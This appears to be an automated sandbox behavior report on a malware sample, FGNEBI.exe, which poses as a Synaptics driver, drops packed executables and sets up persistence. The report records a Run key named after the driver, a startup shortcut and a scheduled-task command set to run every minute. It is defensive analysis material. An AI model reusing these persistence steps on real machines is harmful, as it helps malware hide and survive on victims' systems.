Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Section loaded: propsys.dll

Source: C:\Users\user\Desktop\FGNEBI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: WLJOQW.lnk.2.dr

LNK file: ..\..\..\..\..\Windata\DELPQB.exe

Source: C:\ProgramData\Synaptics\Synaptics.exe

File written: C:\Users\user\AppData\Local\Temp\kmu15KX.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: FGNEBI.exe

Static file information: File size 1691136 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00EF30B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00EF30B0

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00E205A8 push ss; ret	2_2_00E205A9
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00E1D7AC push ds; ret	2_2_00E1D7AE
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB7795 push ecx; ret	2_2_00DB77A8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 3_2_042EC2C8 pushad ; ret	3_2_042EC2C9
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 3_2_06EDFEDF push es; ret	3_2_06EDFEE0
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002705A8 push ss; ret	10_2_002705A9
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0026D7AC push ds; ret	10_2_0026D7AE
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00207795 push ecx; ret	10_2_002077A8

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Source: C:\Users\user\Desktop\FGNEBI.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\Users\user\Desktop\FGNEBI.exe	File created: C:\ProgramData\Synaptics\RCX5CF5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	File created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\~$cache1	Jump to dropped file
Source: C:\Users\user\Desktop\FGNEBI.exe	File created: C:\Users\user\Desktop\._cache_FGNEBI.exe	Jump to dropped file

Source: C:\Users\user\Desktop\FGNEBI.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file
Source: C:\Users\user\Desktop\FGNEBI.exe	File created: C:\ProgramData\Synaptics\RCX5CF5.tmp			Jump to dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk

Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk

Jump to behavior

Source: C:\Users\user\Desktop\FGNEBI.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WLJOQW	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WLJOQW	Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00DAF78E
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00DF7F0E
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_001FF78E
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00247F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	10_2_00247F0E

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00DB1E5A

Source: C:\Users\user\Desktop\FGNEBI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
